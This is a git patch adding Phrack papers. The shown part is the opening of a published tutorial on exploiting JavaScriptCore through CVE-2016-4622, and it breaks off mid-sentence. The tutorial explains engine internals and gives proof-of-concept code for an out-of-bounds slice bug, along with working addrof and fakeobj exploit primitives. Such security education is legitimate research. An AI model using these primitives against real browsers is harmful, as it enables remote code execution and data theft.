From d8aeb8a5c259b90d031866fdafbf0a354260f3c2 Mon Sep 17 00:00:00 2001 From: Rui Reis Date: Fri, 28 Apr 2017 21:20:45 +0100 Subject: [PATCH] add phrack papers --- .../papers/Attacking_JavaScript_Engines.txt | 1621 +++++++++++ phrack/papers/Team_Shellphish.txt | 2409 +++++++++++++++++ phrack/papers/VM_escape.txt | 1784 ++++++++++++ 3 files changed, 5814 insertions(+) create mode 100644 phrack/papers/Attacking_JavaScript_Engines.txt create mode 100644 phrack/papers/Team_Shellphish.txt create mode 100644 phrack/papers/VM_escape.txt diff --git a/phrack/papers/Attacking_JavaScript_Engines.txt b/phrack/papers/Attacking_JavaScript_Engines.txt new file mode 100644 index 0000000..1b8324f --- /dev/null +++ b/phrack/papers/Attacking_JavaScript_Engines.txt @@ -0,0 +1,1621 @@ +|=-----------------------------------------------------------------------=| +|=---------------=[ The Art of Exploitation ]=---------------=| +|=-----------------------------------------------------------------------=| +|=------------------=[ Attacking JavaScript Engines ]=-------------------=| +|=--------=[ A case study of JavaScriptCore and CVE-2016-4622 ]=---------=| +|=-----------------------------------------------------------------------=| +|=----------------------------=[ saelo ]=--------------------------------=| +|=-----------------------=[ phrack@saelo.net ]=--------------------------=| +|=-----------------------------------------------------------------------=| + +--[ Table of contents + +0 - Introduction +1 - JavaScriptCore overview + 1.1 - Values, the VM, and (NaN-)boxing + 1.2 - Objects and arrays + 1.3 - Functions +2 - The bug + 2.1 - The vulnerable code + 2.2 - About JavaScript type conversions + 2.3 - Exploiting with valueOf + 2.4 - Reflecting on the bug +3 - The JavaScriptCore heaps + 3.1 - Garbage collector basics + 3.2 - Marked space + 3.3 - Copied space +4 - Constructing exploit primitives + 4.1 - Prerequisites: Int64 + 4.2 - addrof and fakeobj + 4.3 - Plan of exploitation +5 - Understanding the JSObject system + 5.1 - Property storage + 5.2 - JSObject internals + 5.3 - About structures +6 - Exploitation + 6.1 - Predicting structure IDs + 6.2 - Putting things together: faking a Float64Array + 6.3 - Executing shellcode + 6.4 - Surviving garbage collection + 6.5 - Summary +7 - Abusing the renderer process + 7.1 - WebKit process and privilege model + 7.2 - The same-origin policy + 7.3 - Stealing emails +8 - References +9 - Source code + + +--[ 0 - Introduction + +This article strives to give an introduction to the topic of JavaScript +engine exploitation at the example of a specific vulnerability. The +particular target will be JavaScriptCore, the engine inside WebKit. + +The vulnerability in question is CVE-2016-4622 and was discovered by yours +truly in early 2016, then reported as ZDI-16-485 [1]. It allows an attacker +to leak addresses as well as inject fake JavaScript objects into the +engine. Combining these primitives will result in remote code execution +inside the renderer process. The bug was fixed in 650552a. Code snippets in +this article were taken from commit 320b1fc, which was the last vulnerable +revision. The vulnerability was introduced approximately one year earlier +with commit 2fa4973. All exploit code was tested on Safari 9.1.1. + +The exploitation of said vulnerability requires knowledge of various engine +internals, which are, however, also quite interesting by themselves. As +such various pieces that are part of a modern JavaScript engine will be +discussed along the way. We will focus on the implementation of +JavaScriptCore, but the concepts will generally be applicable to other +engines as well. + +Prior knowledge of the JavaScript language will, for the most part, not be +required. + + +--[ 1 - JavaScript engine overview + +On a high level, a JavaScript engine contains + + * a compiler infrastructure, typically including at least one + just-in-time (JIT) compiler + + * a virtual machine that operates on JavaScript values + + * a runtime that provides a set of builtin objects and functions + +We will not be concerned about the inner workings of the compiler +infrastructure too much as they are mostly irrelevant to this specific bug. +For our purposes it suffices to treat the compiler as a black box which +emits bytecode (and potentially native code in the case of a JIT compiler) +from the given source code. + + +----[ 1.1 - The VM, Values, and NaN-boxing + +The virtual machine (VM) typically contains an interpreter which can +directly execute the emitted bytecode. The VM is often implemented as +stack-based machines (in contrast to register-based machines) and thus +operate around a stack of values. The implementation of a specific opcode +handler might then look something like this: + + CASE(JSOP_ADD) + { + MutableHandleValue lval = REGS.stackHandleAt(-2); + MutableHandleValue rval = REGS.stackHandleAt(-1); + MutableHandleValue res = REGS.stackHandleAt(-2); + if (!AddOperation(cx, lval, rval, res)) + goto error; + REGS.sp--; + } + END_CASE(JSOP_ADD) + +Note that this example is actually taken from Firefox' Spidermonkey engine +as JavaScriptCore (from here on abbreviated as JSC) uses an interpreter +that is written in a form of assembly language and thus not quite as +straightforward as the above example. The interested reader can however +find the implementation of JSC's low-level interpreter (llint) in +LowLevelInterpreter64.asm. + +Often the first stage JIT compiler (sometimes called baseline JIT) takes +care of removing some of the dispatching overhead of the interpreter while +higher stage JIT compilers perform sophisticated optimizations, similar to +the ahead-of-time compilers we are used to. Optimizing JIT compilers are +typically speculative, meaning they will perform optimizations based on +some speculation, e.g. 'this variable will always contain a number'. +Should the speculation ever turn out to be incorrect, the code will usually +bail out to one of the lower tiers. For more information about the +different execution modes the reader is referred to [2] and [3]. + +JavaScript is a dynamically typed language. As such, type information is +associated with the (runtime) values rather than (compile-time) variables. +The JavaScript type system [4] defines primitive types (number, string, +boolean, null, undefined, symbol) and objects (including arrays and +functions). In particular, there is no concept of classes in the JavaScript +language as is present in other languages. Instead, JavaScript uses what is +called "prototype-based-inheritance", where each objects has a (possibly +null) reference to a prototype object whose properties it incorporates. +The interested reader is referred to the JavaScript specification [5] for +more information. + +All major JavaScript engines represent a value with no more than 8 bytes +for performance reasons (fast copying, fits into a register on 64-bit +architectures). Some engines like Google's v8 use tagged pointers to +represent values. Here the least significant bits indicate whether the +value is a pointer or some form of immediate value. JavaScriptCore (JSC) +and Spidermonkey in Firefox on the other hand use a concept called +NaN-boxing. NaN-boxing makes use of the fact that there exist multiple bit +patterns which all represent NaN, so other values can be encoded in these. +Specifically, every IEEE 754 floating point value with all exponent bits +set, but a fraction not equal to zero represents NaN. For double precision +values [6] this leaves us with 2^51 different bit patterns (ignoring the +sign bit and setting the first fraction bit to one so nullptr can still be +represented). That's enough to encode both 32-bit integers and pointers, +since even on 64-bit platforms only 48 bits are currently used for +addressing. + +The scheme used by JSC is nicely explained in JSCJSValue.h, which the +reader is encouraged to read. The relevant part is quoted below as it will +be important later on: + + * The top 16-bits denote the type of the encoded JSValue: + * + * Pointer { 0000:PPPP:PPPP:PPPP + * / 0001:****:****:**** + * Double { ... + * \ FFFE:****:****:**** + * Integer { FFFF:0000:IIII:IIII + * + * The scheme we have implemented encodes double precision values by + * performing a 64-bit integer addition of the value 2^48 to the number. + * After this manipulation no encoded double-precision value will begin + * with the pattern 0x0000 or 0xFFFF. Values must be decoded by + * reversing this operation before subsequent floating point operations + * may be performed. + * + * 32-bit signed integers are marked with the 16-bit tag 0xFFFF. + * + * The tag 0x0000 denotes a pointer, or another form of tagged + * immediate. Boolean, null and undefined values are represented by + * specific, invalid pointer values: + * + * False: 0x06 + * True: 0x07 + * Undefined: 0x0a + * Null: 0x02 + * + +Interestingly, 0x0 is not a valid JSValue and will lead to a crash inside +the engine. + + +----[ 1.2 - Objects and Arrays + +Objects in JavaScript are essentially collections of properties which are +stored as (key, value) pairs. Properties can be accessed either with the +dot operator (foo.bar) or through square brackets (foo['bar']). At least in +theory, values used as keys are converted to strings before performing the +lookup. + +Arrays are described by the specification as special ("exotic") objects +whose properties are also called elements if the property name can be +represented by a 32-bit integer [7]. Most engines today extend this notion +to all objects. An array then becomes an object with a special 'length' +property whose value is always equal to the index of the highest element +plus one. The net result of all this is that every object has both +properties, accessed through a string or symbol key, and elements, accessed +through integer indices. + +Internally, JSC stores both properties and elements in the same memory +region and stores a pointer to that region in the object itself. This +pointer points to the middle of the region, properties are stored to the +left of it (lower addresses) and elements to the right of it. There is also +a small header located just before the pointed to address that contains +the length of the element vector. This concept is called a "Butterfly" +since the values expand to the left and right, similar to the wings of a +butterfly. Presumably. In the following, we will refer to both the pointer +and the memory region as "Butterfly". In case it is not obvious from the +context, the specific meaning will be noted. + +-------------------------------------------------------- +.. | propY | propX | length | elem0 | elem1 | elem2 | .. +-------------------------------------------------------- + ^ + | + +---------------+ + | + +-------------+ + | Some Object | + +-------------+ + +Although typical, elements do not have to be stored linearly in memory. +In particular, code such as + + a = []; + a[0] = 42; + a[10000] = 42; + +will likely lead to an array stored in some kind of sparse mode, which +performs an additional mapping step from the given index to an index into +the backing storage. That way this array does not require 10001 value +slots. Besides the different array storage models, arrays can also store +their data using different representations. For example, an array of 32-bit +integers could be stored in native form to avoid the (NaN-)unboxing and +reboxing process during most operations and save some memory. As such, JSC +defines a set of different indexing types which can be found in +IndexingType.h. The most important ones are: + + ArrayWithInt32 = IsArray | Int32Shape; + ArrayWithDouble = IsArray | DoubleShape; + ArrayWithContiguous = IsArray | ContiguousShape; + +Here, the last type stores JSValues while the former two store their native +types. + +At this point the reader probably wonders how a property lookup is +performed in this model. We will dive into this extensively later on, but +the short version is that a special meta-object, called a "structure" in +JSC, is associated with every object which provides a mapping from property +names to slot numbers. + + +----[ 1.3 - Functions + +Functions are quite important in the JavaScript language. As such they +deserve some discussion on their own. + +When executing a function's body, two special variables become available. +One of them, 'arguments' provides access to the arguments (and caller) of +the function, thus enabling the creation of function with a variable number +of arguments. The other, 'this', refers to different objects depending on +the invocation of the function: + + * If the function was called as a constructor (using 'new func()'), + then 'this' points to the newly created object. Its prototype has + already been set to the .prototype property of the function object, + which is set to a new object during function definition. + + * If the function was called as a method of some object (using + 'obj.func()'), then 'this' will point to the reference object. + + * Else 'this' simply points to the current global object, as it does + outside of a function as well. + +Since functions are first class objects in JavaScript they too can have +properties. We've already seen the .prototype property above. Two other +quite interesting properties of each function (actually of the function +prototype) are the .call and .apply functions, which allow calling the +function with a given 'this' object and arguments. This can for example be +used to implement decorator functionality: + + function decorate(func) { + return function() { + for (var i = 0; i < arguments.length; i++) { + // do something with arguments[i] + } + return func.apply(this, arguments); + }; + } + +This also has some implications on the implementation of JavaScript +functions inside the engine as they cannot make any assumptions about the +value of the reference object which they are called with, as it can be set +to arbitrary values from script. Thus, all internal JavaScript functions +will need to check the type of not only their arguments but also of the +this object. + +Internally, the built-in functions and methods [8] are usually implemented +in one of two ways: as native functions in C++ or in JavaScript itself. +Let's look at a simple example of a native function in JSC: the +implementation of Math.pow(): + + EncodedJSValue JSC_HOST_CALL mathProtoFuncPow(ExecState* exec) + { + // ECMA 15.8.2.1.13 + + double arg = exec->argument(0).toNumber(exec); + double arg2 = exec->argument(1).toNumber(exec); + + return JSValue::encode(JSValue(operationMathPow(arg, arg2))); + } + +We can see: + + 1. The signature for native JavaScript functions + + 2. How arguments are extracted using the argument method (which returns + the undefined value if not enough arguments were provided) + + 3. How arguments are converted to their required type. There is a set + of conversion rules governing the conversion of e.g. arrays to + numbers which toNumber will make use of. More on these later. + + 4. How the actual operation is performed on the native data type + + 5. How the result is returned to the caller. In this case simply by + encoding the resulting native number into a value. + +There is another pattern visible here: the core implementation of various +operations (in this case operationMathPow) are moved into separate +functions so they can be called directly from JIT compiled code. + + +--[ 2 - The bug + +The bug in question lies in the implementation of Array.prototype.slice +[9]. The native function arrayProtoFuncSlice, located in +ArrayPrototype.cpp, is invoked whenever the slice method is called in +JavaScript: + + var a = [1, 2, 3, 4]; + var s = a.slice(1, 3); + // s now contains [2, 3] + +The implementation is given below with minor reformatting, some omissions +for readability, and markers for the explanation below. The full +implementation can be found online as well [10]. + + EncodedJSValue JSC_HOST_CALL arrayProtoFuncSlice(ExecState* exec) + { + /* [[ 1 ]] */ + JSObject* thisObj = exec->thisValue() + .toThis(exec, StrictMode) + .toObject(exec); + if (!thisObj) + return JSValue::encode(JSValue()); + + /* [[ 2 ]] */ + unsigned length = getLength(exec, thisObj); + if (exec->hadException()) + return JSValue::encode(jsUndefined()); + + /* [[ 3 ]] */ + unsigned begin = argumentClampedIndexFromStartOrEnd(exec, 0, length); + unsigned end = + argumentClampedIndexFromStartOrEnd(exec, 1, length, length); + + /* [[ 4 ]] */ + std::pair speciesResult = + speciesConstructArray(exec, thisObj, end - begin); + // We can only get an exception if we call some user function. + if (UNLIKELY(speciesResult.first == + SpeciesConstructResult::Exception)) + return JSValue::encode(jsUndefined()); + + /* [[ 5 ]] */ + if (LIKELY(speciesResult.first == SpeciesConstructResult::FastPath && + isJSArray(thisObj))) { + if (JSArray* result = + asArray(thisObj)->fastSlice(*exec, begin, end - begin)) + return JSValue::encode(result); + } + + JSObject* result; + if (speciesResult.first == SpeciesConstructResult::CreatedObject) + result = speciesResult.second; + else + result = constructEmptyArray(exec, nullptr, end - begin); + + unsigned n = 0; + for (unsigned k = begin; k < end; k++, n++) { + JSValue v = getProperty(exec, thisObj, k); + if (exec->hadException()) + return JSValue::encode(jsUndefined()); + if (v) + result->putDirectIndex(exec, n, v); + } + setLength(exec, result, n); + return JSValue::encode(result); + } + +The code essentially does the following: + + 1. Obtain the reference object for the method call (this will be the + array object) + + 2. Retrieve the length of the array + + 3. Convert the arguments (start and end index) into native integer + types and clamp them to the range [0, length) + + 4. Check if a species constructor [11] should be used + + 5. Perform the slicing + +The last step is done in one of two ways: if the array is a native array +with dense storage, 'fastSlice' will be used which just memcpy's the values +into the new array using the given index and length. If the fast path is +not possible, a simple loop is used to fetch each element and add it to the +new array. Note that, in contrast to the property accessors used on the +slow path, fastSlice does not perform any additional bounds checking... ;) + +Looking at the code, it is easy to assume that the variables 'begin' and +`end` would be smaller than the size of the array after they had been +converted to native integers. However, we can violate that assumption by +(ab)using the JavaScript type conversion rules. + + +----[ 2.2 - About JavaScript conversion rules + +JavaScript is inherently weakly typed, meaning it will happily convert +values of different types into the type that it currently requires. +Consider Math.abs(), which returns the absolute value of the argument. All +of the following are "valid" invocations, meaning they won't raise an +exception: + + Math.abs(-42); // argument is a number + // 42 + Math.abs("-42"); // argument is a string + // 42 + Math.abs([]); // argument is an empty array + // 0 + Math.abs(true); // argument is a boolean + // 1 + Math.abs({}); // argument is an object + // NaN + +In contrast, strongly-typed languages such as python will usually raise an +exception (or, in case of statically-typed languages, issue a compiler +error) if e.g. a string is passed to abs(). + +The conversion rules for numeric types are described in [12]. The rules +governing the conversion from object types to numbers (and primitive types +in general) are especially interesting. In particular, if the object has a +callable property named "valueOf", this method will be called and the +return value used if it is a primitive value. And thus: + + Math.abs({valueOf: function() { return -42; }}); + // 42 + + +----[ 2.3 - Exploiting with "valueOf" + +In the case of `arrayProtoFuncSlice` the conversion to a primitive type is +performed in argumentClampedIndexFromStartOrEnd. This method also clamps +the arguments to the range [0, length): + + JSValue value = exec->argument(argument); + if (value.isUndefined()) + return undefinedValue; + + double indexDouble = value.toInteger(exec); // Conversion happens here + if (indexDouble < 0) { + indexDouble += length; + return indexDouble < 0 ? 0 : static_cast(indexDouble); + } + return indexDouble > length ? length : + static_cast(indexDouble); + +Now, if we modify the length of the array inside a valueOf function of one +of the arguments, then the implementation of slice will continue to use the +previous length, resulting in an out-of-bounds access during the memcpy. + +Before doing this however, we have to make sure that the element storage is +actually resized if we shrink the array. For that let's have a quick look +at the implementation of the .length setter. From JSArray::setLength: + + unsigned lengthToClear = butterfly->publicLength() - newLength; + unsigned costToAllocateNewButterfly = 64; // a heuristic. + if (lengthToClear > newLength && + lengthToClear > costToAllocateNewButterfly) { + reallocateAndShrinkButterfly(exec->vm(), newLength); + return true; + } + +This code implements a simple heuristic to avoid relocating the array too +often. To force a relocation of our array we will thus need the new size to +be much less then the old size. Resizing from e.g. 100 elements to 0 will +do the trick. + +With that, here's how we can exploit Array.prototype.slice: + + var a = []; + for (var i = 0; i < 100; i++) + a.push(i + 0.123); + + var b = a.slice(0, {valueOf: function() { a.length = 0; return 10; }}); + // b = [0.123,1.123,2.12199579146e-313,0,0,0,0,0,0,0] + +The correct output would have been an array of size 10 filled with +'undefined' values since the array has been cleared prior to the slice +operation. However, we can see some float values in the array. Seems like +we've read some stuff past the end of the array elements :) + + +----[ 2.4 - Reflecting on the bug + +This particular programming mistake is not new and has been exploited for a +while now [13, 14, 15]. The core problem here is (mutable) state that is +"cached" in a stack frame (in this case the length of the array object) in +combination with various callback mechanisms that can execute user supplied +code further down in the call stack (in this case the "valueOf" method). +With this setting it is quite easy to make false assumptions about the +state of the engine throughout a function. The same kind of problem +appears in the DOM as well due to the various event callbacks. + + +--[ 3 - The JavaScriptCore heaps + +At this point we've read data past our array but don't quite know what we +are accessing there. To understand this, some background knowledge about +the JSC heap allocators is required. + + +----[ 3.1 - Garbage collector basics + +JavaScript is a garbage collected language, meaning the programmer does not +need to care about memory management. Instead, the garbage collector will +collect unreachable objects from time to time. + +One approach to garbage collection is reference counting, which is used +extensively in many applications. However, as of today, all major +JavaScript engines instead use a mark and sweep algorithm. Here the +collector regularly scans all alive objects, starting from a set of root +nodes, and afterwards frees all dead objects. The root nodes are usually +pointers located on the stack as well as global objects like the 'window' +object in a web browser context. + +There are various distinctions between garbage collection systems. We will +now discuss some key properties of garbage collection systems which should +help the reader understand some of the related code. Readers familiar with +the subject are free to skip to the end of this section. + +First off, JSC uses a conservative garbage collector [16]. In essence, this +means that the GC does not keep track of the root nodes itself. Instead, +during GC it will scan the stack for any value that could be a pointer into +the heap and treats those as root nodes. In contrast, e.g. Spidermonkey +uses a precise garbage collector and thus needs to wrap all references to +heap objects on the stack inside a pointer class (Rooted<>) that takes care +of registering the object with the garbage collector. + +Next, JSC uses an incremental garbage collector. This kind of garbage +collector performs the marking in several steps and allows the application +to run in between, reducing GC latency. However, this requires some +additional effort to work correctly. Consider the following case: + + * the GC runs and visits some object O and all its referenced objects. + It marks them as visited and later pauses so the application can run + again. + + * O is modified and a new reference to another Object P is added to it. + + * Then the GC runs again but it doesn't know about P. It finishes the + marking phase and frees the memory of P. + +To avoid this scenario, so called write barriers are inserted into the +engine. These take care of notifying the garbage collector in such a +scenario. These barriers are implemented in JSC with the WriteBarrier<> +and CopyBarrier<> classes. + +Last, JSC uses both, a moving and a non-moving garbage collector. A moving +garbage collector moves live objects to a different location and updates +all pointers to these objects. This optimizes for the case of many dead +objects since there is no runtime overhead for these: instead of adding +them to a free list, the whole memory region is simply declared free. JSC +stores the JavaScript objects itself, together with a few other objects, +inside a non-moving heap, the marked space, while storing the butterflies +and other arrays inside a moving heap, the copied space. + + +----[ 3.2 - Marked space + +The marked space is a collection of memory blocks that keep track of the +allocated cells. In JSC, every object allocated in marked space must +inherit from the JSCell class and thus starts with an eight byte header, +which, among other fields, contains the current cell state as used by the +GC. This field is used by the collector to keep track of the cells that it +has already visited. + +There is another thing worth mentioning about the marked space: JSC stores +a MarkedBlock instance at the beginning of each marked block: + + inline MarkedBlock* MarkedBlock::blockFor(const void* p) + { + return reinterpret_cast( + reinterpret_cast(p) & blockMask); + } + +This instance contains among other things a pointers to the owning Heap +and VM instance which allows the engine to obtain these if they are not +available in the current context. This makes it more difficult to set up +fake objects, as a valid MarkedBlock instance might be required when +performing certain operations. It is thus desirable to create fake objects +inside a valid marked block if possible. + + +----[ 3.3 - Copied space + +The copied space stores memory buffers that are associated with some object +inside the marked space. These are mostly butterflies, but the contents of +typed arrays may also be located here. As such, our out-of-bounds access +happens in this memory region. + +The copied space allocator is very simple: + + CheckedBoolean CopiedAllocator::tryAllocate(size_t bytes, void** out) + { + ASSERT(is8ByteAligned(reinterpret_cast(bytes))); + + size_t currentRemaining = m_currentRemaining; + if (bytes > currentRemaining) + return false; + currentRemaining -= bytes; + m_currentRemaining = currentRemaining; + *out = m_currentPayloadEnd - currentRemaining - bytes; + + ASSERT(is8ByteAligned(*out)); + + return true; + } + +This is essentially a bump allocator: it will simply return the next N +bytes of memory in the current block until the block is completely used. +Thus, it is almost guaranteed that two following allocations will be placed +adjacent to each other in memory (the edge case being that the first fills +up the current block). + +This is good news for us. If we allocate two arrays with one element each, +then the two butterflies will be next to each other in virtually every +case. + + +--[ 4 - Building exploit primitives + +While the bug in question looks like an out-of-bound read at first, it is +actually a more powerful primitive as it lets us "inject" JSValues of our +choosing into the newly created JavaScript arrays, and thus into the +engine. + +We will now construct two exploit primitives from the given bug, allowing +us to + + 1. leak the address of an arbitrary JavaScript object and + + 2. inject a fake JavaScript Object into the engine. + +We will call these primitives 'addrof' and 'fakeobj'. + + +----[ 4.1 Prerequisites: Int64 + +As we've previously seen, our exploit primitive currently returns floating +point values instead of integers. In fact, at least in theory, all numbers +in JavaScript are 64-bit floating point numbers [17]. In reality, as +already mentioned, most engines have a dedicated 32-bit integer type for +performance reasons, but convert to floating point values when necessary +(i.e. on overflow). It is thus not possible to represent arbitrary 64-bit +integers (and in particular addresses) with primitive numbers in +JavaScript. + +As such, a helper module had to be built which allowed storing 64-bit +integer instances. It supports + + * Initialization of Int64 instances from different argument types: + strings, numbers and byte arrays. + + * Assigning the result of addition and subtraction to an existing + instance through the assignXXX methods. Using these methods avoids + further heap allocations which might be desirable at times. + + * Creating new instances that store the result of an addition or + subtraction through the Add and Sub functions. + + * Converting between doubles, JSValues and Int64 instances such that + the underlying bit pattern stays the same. + +The last point deserves further discussing. As we've seen above, we obtain +a double whose underlying memory interpreted as native integer is our +desired address. We thus need to convert between native doubles and our +integers such that the underlying bits stay the same. asDouble() can be +thought of as running the following C code: + + double asDouble(uint64_t num) + { + return *(double*)# + } + +The asJSValue method further respects the NaN-boxing procedure and produces +a JSValue with the given bit pattern. The interested reader is referred to +the int64.js file inside the attached source code archive for more +details. + +With this out of the way let us get back to building our two exploit +primitives. + + +----[ 4.2 addrof and fakeobj + +Both primitives rely on the fact that JSC stores arrays of doubles in +native representation as opposed to the NaN-boxed representation. This +essentially allows us to write native doubles (indexing type +ArrayWithDoubles) but have the engine treat them as JSValues (indexing type +ArrayWithContiguous) and vice versa. + +So, here are the steps required for exploiting the address leak: + + 1. Create an array of doubles. This will be stored internally as + IndexingType ArrayWithDouble + + 2. Set up an object with a custom valueOf function which will + + 2.1 shrink the previously created array + + 2.2 allocate a new array containing just the object whose address + we wish to know. This array will (most likely) be placed right + behind the new butterfly since it's located in copied space + + 2.3 return a value larger than the new size of the array to trigger + the bug + + 3. Call slice() on the target array the object from step 2 as one of + the arguments + +We will now find the desired address in the form of a 64-bit floating point +value inside the array. This works because slice() preserves the indexing +type. Our new array will thus treat the data as native doubles as well, +allowing us to leak arbitrary JSValue instances, and thus pointers. + +The fakeobj primitive works essentially the other way around. Here we +inject native doubles into an array of JSValues, allowing us to create +JSObject pointers: + + 1. Create an array of objects. This will be stored internally as + IndexingType ArrayWithContiguous + + 2. Set up an object with a custom valueOf function which will + + 2.1 shrink the previously created array + + 2.2 allocate a new array containing just a double whose bit pattern + matches the address of the JSObject we wish to inject. The + double will be stored in native form since the array's + IndexingType will be ArrayWithDouble + + 2.3 return a value larger than the new size of the array to trigger + the bug + + 3. Call slice() on the target array the object from step 2 as one of + the arguments + +For completeness, the implementation of both primitives is printed below. + + function addrof(object) { + var a = []; + for (var i = 0; i < 100; i++) + a.push(i + 0.1337); // Array must be of type ArrayWithDoubles + + var hax = {valueOf: function() { + a.length = 0; + a = [object]; + return 4; + }}; + + var b = a.slice(0, hax); + return Int64.fromDouble(b[3]); + } + + function fakeobj(addr) { + var a = []; + for (var i = 0; i < 100; i++) + a.push({}); // Array must be of type ArrayWithContiguous + + addr = addr.asDouble(); + var hax = {valueOf: function() { + a.length = 0; + a = [addr]; + return 4; + }}; + + return a.slice(0, hax)[3]; + } + + +----[ 4.3 - Plan of exploitation + +From here on our goal will be to obtain an arbitrary memory read/write +primitive through a fake JavaScript object. We are faced with the following +questions: + + Q1. What kind of object do we want to fake? + + Q2. How do we fake such an object? + + Q3. Where do we place the faked object so that we know its address? + +For a while now, JavaScript engines have supported typed arrays [18], an +efficient and highly optimizable storage for raw binary data. These turn +out to be good candidates for our fake object as they are mutable (in +contrast to JavaScript strings) and thus controlling their data pointer +yields an arbitrary read/write primitive usable from script. Ultimately our +goal will now be to fake a Float64Array instance. + +We will now turn to Q2 and Q3, which require another discussion of JSC +internals, namely the JSObject system. + + +--[ 5 - Understanding the JSObject system + +JavaScript objects are implemented in JSC by a combination of C++ classes. +At the center lies the JSObject class which is itself a JSCell (and as such +tracked by the garbage collector). There are various subclasses of JSObject +that loosely resemble different JavaScript objects, such as Arrays +(JSArray), Typed arrays (JSArrayBufferView), or Proxys (JSProxy). + +We will now explore the different parts that make up JSObjects inside the +JSC engine. + + +----[ 5.1 - Property storage + +Properties are the most important aspect of JavaScript objects. We have +already seen how properties are stored in the engine: the butterfly. But +that is only half the truth. Besides the butterfly, JSObjects can also have +inline storage (6 slots by default, but subject to runtime analysis), +located right after the object in memory. This can result in a slight +performance gain if no butterfly ever needs to be allocated for an object. + +The inline storage is interesting for us since we can leak the address of +an object, and thus know the address of its inline slots. These make up a +good candidate to place our fake object in. As added bonus, going this way +we also avoid any problem that might arise when placing an object outside +of a marked block as previously discussed. This answers Q3. + +Let's turn to Q2 now. + + +----[ 5.2 - JSObject internals + +We will start with an example: suppose we run the following piece of JS +code: + + obj = {'a': 0x1337, 'b': false, 'c': 13.37, 'd': [1,2,3,4]}; + +This will result in the following object: + + (lldb) x/6gx 0x10cd97c10 + 0x10cd97c10: 0x0100150000000136 0x0000000000000000 + 0x10cd97c20: 0xffff000000001337 0x0000000000000006 + 0x10cd97c30: 0x402bbd70a3d70a3d 0x000000010cdc7e10 + +The first quadword is the JSCell. The second one the Butterfly pointer, +which is null since all properties are stored inline. Next are the inline +JSValue slots for the four properties: an integer, false, a double, and a +JSObject pointer. If we were to add more properties to the object, a +butterfly would at some point be allocated to store these. + +So what does a JSCell contain? JSCell.h reveals: + + StructureID m_structureID; + This is the most interesting one, we'll explore it further below. + + IndexingType m_indexingType; + We've already seen this before. It indicates the storage mode of + the object's elements. + + JSType m_type; + Stores the type of this cell: string, symbol,function, + plain object, ... + + TypeInfo::InlineTypeFlags m_flags; + Flags that aren't too important for our purposes. JSTypeInfo.h + contains further information. + + CellState m_cellState; + We've also seen this before. It is used by the garbage collector + during collection. + + +----[ 5.3 - About structures + +JSC creates meta-objects which describe the structure, or layout, of a +JavaScript object. These objects represent mappings from property names to +indices into the inline storage or the butterfly (both are treated as +JSValue arrays). In its most basic form, such a structure could be an array +of pairs. It could also be implemented as a +linked list or a hash map. Instead of storing a pointer to this structure +in every JSCell instance, the developers instead decided to store a 32-bit +index into a structure table to save some space for the other fields. + +So what happens when a new property is added to an object? If this happens +for the first time then a new Structure instance will be allocated, +containing the previous slot indices for all exiting properties and an +additional one for the new property. The property would then be stored at +the corresponding index, possibly requiring a reallocation of the +butterfly. To avoid repeating this process, the resulting Structure +instance can be cached in the previous structure, in a data structure +called "transiton table". The original structure might also be adjusted to +allocate more inline or butterfly storage up front to avoid the +reallocation. This mechanism ultimately makes structures reusable. + +Time for an example. Suppose we have the following JavaScript code: + + var o = { foo: 42 }; + if (someCondition) + o.bar = 43; + else + o.baz = 44; + +This would result in the creation of the following three Structure +instances, here shown with the (arbitrary) property name to slot index +mappings: + ++-----------------+ +-----------------+ +| Structure 1 | +bar | Structure 2 | +| +--------->| | +| foo: 0 | | foo: 0 | ++--------+--------+ | bar: 1 | + | +-----------------+ + | +baz +-----------------+ + +-------->| Structure 3 | + | | + | foo: 0 | + | baz: 1 | + +-----------------+ + +Whenever this piece of code was executed again, the correct structure for +the created object would then be easy to find. + +Essentially the same concept is used by all major engines today. V8 calls +them maps or hidden classes [19] while Spidermonkey calls them Shapes. + +This technique also makes speculative JIT compilers simpler. Assume the +following function: + + function foo(a) { + return a.bar + 3; + } + +Assume further that we have executed the above function a couple of times +inside the interpreter and now decide to compile it to native code for +better performance. How do we deal with the property lookup? We could +simply jump out to the interpreter to perform the lookup, but that would be +quite expensive. Assuming we've also traced the objects that were given to +foo as arguments and found out they all used the same structure. We can now +generate (pseudo-)assembly code like the following. Here r0 initially +points to the argument object: + + mov r1, [r0 + #structure_id_offset]; + cmp r1, #structure_id; + jne bailout_to_interpreter; + mov r2, [r0 + #inline_property_offset]; + +This is just a few instructions slower than a property access in a native +language such as C. Note that the structure ID and property offset are +cached inside the code itself, thus the name for these kind of code +constructs: inline caches. + +Besides the property mappings, structures also store a reference to a +ClassInfo instance. This instance contains the name of the class +("Float64Array", "HTMLParagraphElement", ...), which is also accessible +from script via the following slight hack: + + Object.prototype.toString.call(object); + // Might print "[object HTMLParagraphElement]" + +However, the more important property of the ClassInfo is its MethodTable +reference. A MethodTable contains a set of function pointers, similar to a +vtable in C++. Most of the object related operations [20] as well as some +garbage collection related tasks (visiting all referenced objects for +example) are implemented through methods in the method table. To give an +idea about how the method table is used, the following code snippet from +JSArray.cpp is shown. This function is part of the MethodTable of the +ClassInfo instance for JavaScript arrays and will be called whenever a +property of such an instance is deleted [21] by script + + bool JSArray::deleteProperty(JSCell* cell, ExecState* exec, + PropertyName propertyName) + { + JSArray* thisObject = jsCast(cell); + + if (propertyName == exec->propertyNames().length) + return false; + + return JSObject::deleteProperty(thisObject, exec, propertyName); + } + +As we can see, deleteProperty has a special case for the .length property +of an array (which it won't delete), but otherwise forwards the request to +the parent implementation. + +The next diagram summarizes (and slightly simplifies) the relationships +between the different C++ classes that together build up the JSC object +system. + + +------------------------------------------+ + | Butterfly | + | baz | bar | foo | length: 2 | 42 | 13.37 | + +------------------------------------------+ + ^ + +---------+ + +----------+ | + | | | + +--+ JSCell | | +-----------------+ + | | | | | | + | +----------+ | | MethodTable | + | /\ | | | + References | || inherits | | Put | + by ID in | +----++----+ | | Get | + structure | | +-----+ | Delete | + table | | JSObject | | VisitChildren | + | | |<----- | ... | + | +----------+ | | | + | /\ | +-----------------+ + | || inherits | ^ + | +----++----+ | | + | | | | associated | + | | JSArray | | prototype | + | | | | object | + | +----------+ | | + | | | + v | +-------+--------+ + +-------------------+ | | ClassInfo | + | Structure +---+ +-->| | + | | | | Name: "Array" | + | property: slot | | | | + | foo : 0 +----------+ +----------------+ + | bar : 1 | + | baz : 2 | + | | + +-------------------+ + + +--[ 6 - Exploitation + +Now that we know a bit more about the internals of the JSObject class, +let's get back to creating our own Float64Array instance which will provide +us with an arbitrary memory 